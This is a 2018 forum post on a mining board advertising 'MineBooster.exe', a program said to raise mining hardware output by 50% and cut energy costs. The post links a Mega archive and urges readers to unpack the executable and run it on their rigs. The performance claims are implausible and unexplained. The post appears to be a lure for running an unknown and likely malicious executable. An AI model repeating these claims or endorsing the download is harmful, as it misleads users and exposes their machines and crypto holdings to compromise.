buddhaminer

MineBooster (+ 50% to the power of your iron) (V.1.89)

Fri Apr 20, 2018 5:28 pm

Good time of day, dear members of the forum.

////////////////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////

I uploaded a new version of the program, now it works without problems. Link to file sharing with archive:

https://mega.nz/#!u2ZjiLoK!zeHSpU6mPmea ... QtXV2bjLE4

////////////////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////

Today I will tell you about the very program that will speed up your mining, and will reduce costs.

You may have a question, no ... not "possible," but it certainly did. "What is this MIRACLE PROGRAM such, and how does it work at all?" you ask, and I'll try to answer you.

We all know perfectly well that to extract all the beloved crypto currency we need a fairly powerful iron, and a lot of energy and time. These are the obvious things !!!
We all know perfectly well that different crypto-currencies use different models of computation, but they are always long enough to find an acceptable option, we need little time. And what to do, this is the file that many dreamed about), this file will run a command on your hardware, to which the farm is connected. Accelerate the extraction of crypts, and reduce energy costs. The matter is that many processes of extraction of a crypt on your iron are done in vain. And this .exe - shnik will simply disconnect all these processes, and the extraction of the crypt will not only be profitable, but also fast.

Thank you for reading to the end. All you need to do is download RAR, unpack from there MineBooster.exe - shnik, and just simply run on your hardware. The path to the program by the link above. Use, because we are all the UNION of CRYPTOTTORS !!!)))

Return to “Pools”